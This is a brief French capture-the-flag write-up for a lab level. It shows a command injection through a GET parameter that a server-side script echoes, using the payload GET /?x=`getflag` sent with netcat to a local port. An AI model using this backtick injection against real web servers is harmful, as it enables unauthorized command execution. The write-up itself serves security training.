Il y a un script qui fait tourner un serveur
On se rend compte qu'il tourne avec un find / -user flag04 car il est sur le serveur apache
on voit que le serveur affiche le parametre "x" passe en get avec un echo
echo peut afficher le resultat de commande si elle mise entre backquotes par exemple "echo `ls`"
on envoi un requete GET /?x=`getflag` avec netcat sur le port 4747 du pc

$ nc 127.0.0.1 4747
GET /?x=`getflag`

le serveur renvoie le flag